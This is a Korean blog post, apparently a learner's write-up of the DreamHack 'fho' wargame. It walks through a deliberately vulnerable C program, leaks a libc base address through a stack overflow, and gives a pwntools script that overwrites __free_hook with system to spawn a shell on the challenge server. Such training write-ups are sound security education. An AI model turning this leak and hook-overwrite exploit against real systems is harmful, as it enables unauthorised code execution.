3omh4n
3omh4
3omh4n
  • 분류 전체보기 (65)
    • wargame - system (0)
      • DreamHack (9)
      • FTZ (5)
      • LoB (4)
      • pwnable.kr (1)
    • wargame - reversing (0)
      • DreamHack (5)
    • wargame - web (6)
      • webhacking.kr (3)
      • DreamHack (3)
      • HackCTF (0)
    • CS (21)
      • system (19)
      • reversing (0)
      • Linux (2)
    • python (5)
      • Flask (5)
    • C++ (3)
    • 개인기록 (2)
    • 이거저거 (4)

블로그 메뉴

  • 홈
  • 태그
  • 방명록

공지사항

인기 글

최근 댓글

최근 글

태그

  • Programming
  • hackerschool
  • python
  • Dreamhack
  • RELRO
  • ROP
  • LOB
  • langage
  • webhacking
  • BOF
  • System
  • Reversing
  • hacking
  • Devtools
  • pwntools
  • C++
  • flask
  • error
  • ftz
  • systemhacking

티스토리

전체 방문자
오늘
어제
3omh4n
CS/system

[System][Dreamhack] Exploit Tech: Hook Overwrite(2/2)

[System][Dreamhack] Exploit Tech: Hook Overwrite(2/2)
CS/system

[System][Dreamhack] Exploit Tech: Hook Overwrite(2/2)

2024. 3. 4. 22:19

드림핵 RELRO 강의, 드림핵 wargame fho 문제에 대한 글이다.

Free Hook Overwrite

실습 코드

// Name: fho.c
// Compile: gcc -o fho fho.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
char buf[0x30];
unsigned long long *addr;
unsigned long long value;
setvbuf(stdin, 0, _IONBF, 0);
setvbuf(stdout, 0, _IONBF, 0);
puts("[1] Stack buffer overflow");
printf("Buf: ");
read(0, buf, 0x100);
printf("Buf: %s\n", buf);
puts("[2] Arbitrary-Address-Write");
printf("To write: ");
scanf("%llu", &addr);
printf("With: ");
scanf("%llu", &value);
printf("[%p] = %llu\n", addr, value);
*addr = value;
puts("[3] Arbitrary-Address-Free");
printf("To free: ");
scanf("%llu", &addr);
free(addr);
return 0;
}

보호 기법

 

모든 보호 기법이 적용되어 있음을 알 수 있다.

코드 분석

line16 - 19

  • 버퍼의 크기는 0x30이고, read로 버퍼에 적는 값은 0x100이므로 버퍼오버플로우가 발생한다.
  • 카나리 값도 모르고, ret 주소 조작할만한 것 없다. → 스택의 데이터를 읽는 데 사용

line 21 - 27

  • 주소를 입력하고, 해당 주소에 임의의 값을 쓸 수 있다.

line 29 - 32

  • 주소를 입력하고, 해당 메모리를 해제할 수 있다.

페이로드 설계

1. 라이브러리 변수 및 함수의 주소 구하기

__free_hook, system, "/bin/sh" 문자열은 libc 파일에 정의되어 있으니, libc 파일로부터 offset을 얻을 수 있다.

  • __free_hook offset = 0x3ed8e8
  • system func offset = 0x4f550
  • "/bin/sh" string offset = 0x1b3e1a

이제 실제 매핑된 주소를 구하기 위해서는 libc의 base address를 알아야 된다. 보통 스택에는 libc의 주소가 있을 가능성이 매우 크다. libc의 라이브러리 함수인 __libc_start_main 함수가 main함수를 호출한다. 따라서 스택의 값을 읽을 수 있을 때, main 함수의 스택프레임에 존재하는 return address를 읽으면 그 주소를 기반으로 libc의 base address를 구할 수 있고, 다른 함수들의 주소도 구할 수 있다.

a. main함수의 return address 구하기 (__libc_start_main 내부)
b. __libc_start_main 시작으로부터 main의 return까지 offset 구하기
c. main의 return address - (__libc_start_main + 2번으로 구한 값) = libc의 base address

a. main 함수의 return address는 0x7f2f82353c87 -> bof로 획득 가능

b. __libc_start_main의 시작으로부터 +231 만큼 떨어진 위치

c. 0x7f2f82353c87 - (0x21b10+231) = libc의 base address

2. 쉘 획득

1번 과정에서 구한 함수 주소를 이용해, line 21- 27에서 __free_hook의 값을 system함수로 덮고 ilne29-32에서 "/bin/sh"의 주소값을 넣어 free함수를 실행하면 __free_hook("/bin/sh")이 system("/bin/sh")을 호출하게 된다.

 

페이로드 작성

1. 라이브러리 변수 및 함수들의 주소 구하기

bof를 통해 main함수의 return address를 구한다. 이후 libc의 base 주소를 앞서 설명한 과정대로 구해준다.

p = remote('host3.dreamhack.games',15612)
e = ELF("./fho")
libc = ELF("./libc-2.27.so")
off_system = libc.symbols['system']
off_free_hook = libc.symbols['__free_hook']
off_libc_start = libc.symbols['__libc_start_main']
off_binsh = next(libc.search(b'/bin/sh'))
# Buffer OverFlow
buf = b'A'*0x48
p.sendafter('Buf: ', buf)
p.recvuntil(buf)
main_return_address = u64(p.recvline()[:-1] + b'\x00'*2) # main의 return address
base_libc = main_return_address - (off_libc_start + 231)
system = base_libc + off_system
free_hook = base_libc + off_free_hook
binsh = base_libc + off_binsh
slog('libc_base', base_libc)
slog('free_hook',free_hook)
slog('system', system)
slog('/bin/sh', binsh)

buffer 구조는 아래와 같다. 따라서 Buf에 0x48만큼의 값을 넣어 return address를 얻을 수 있다.

2. 쉘 획득

p.recvuntil('To write: ')
p.sendline(str(free_hook).encode())
p.recvuntil('With: ')
p.sendline(str(system).encode())
p.recvuntil('To free: ')
p.sendline(str(binsh).encode())
p.interactive()

 

'CS > system' 카테고리의 다른 글

[System][Dreamhack] Out of Bound- OOB  (0) 2025.03.31
[System][Dreamhack] Exploit Tech: Hook Overwrite - one_gadget  (0) 2024.03.11
[System][Dreamhack] Exploit Tech: Hook Overwrite(1/2)  (0) 2024.01.24
[System][Dreamhack] RELRO - RELocation Read-Only  (1) 2024.01.02
[System][Dreamhack] PIE - Position-Independent Executable  (0) 2023.12.26
  • Free Hook Overwrite
  • 실습 코드
  • 보호 기법
  • 코드 분석
  • 페이로드 설계
  • 페이로드 작성
'CS/system' 카테고리의 다른 글
  • [System][Dreamhack] Out of Bound- OOB
  • [System][Dreamhack] Exploit Tech: Hook Overwrite - one_gadget
  • [System][Dreamhack] Exploit Tech: Hook Overwrite(1/2)
  • [System][Dreamhack] RELRO - RELocation Read-Only
3omh4n
3omh4n

티스토리툴바

단축키

내 블로그

내 블로그 - 관리자 홈 전환
Q
Q
새 글 쓰기
W
W

블로그 게시글

글 수정 (권한 있는 경우)
E
E
댓글 영역으로 이동
C
C

모든 영역

이 페이지의 URL 복사
S
S
맨 위로 이동
T
T
티스토리 홈 이동
H
H
단축키 안내
Shift + /
⇧ + /

* 단축키는 한글/영문 대소문자로 이용 가능하며, 티스토리 기본 도메인에서만 동작합니다.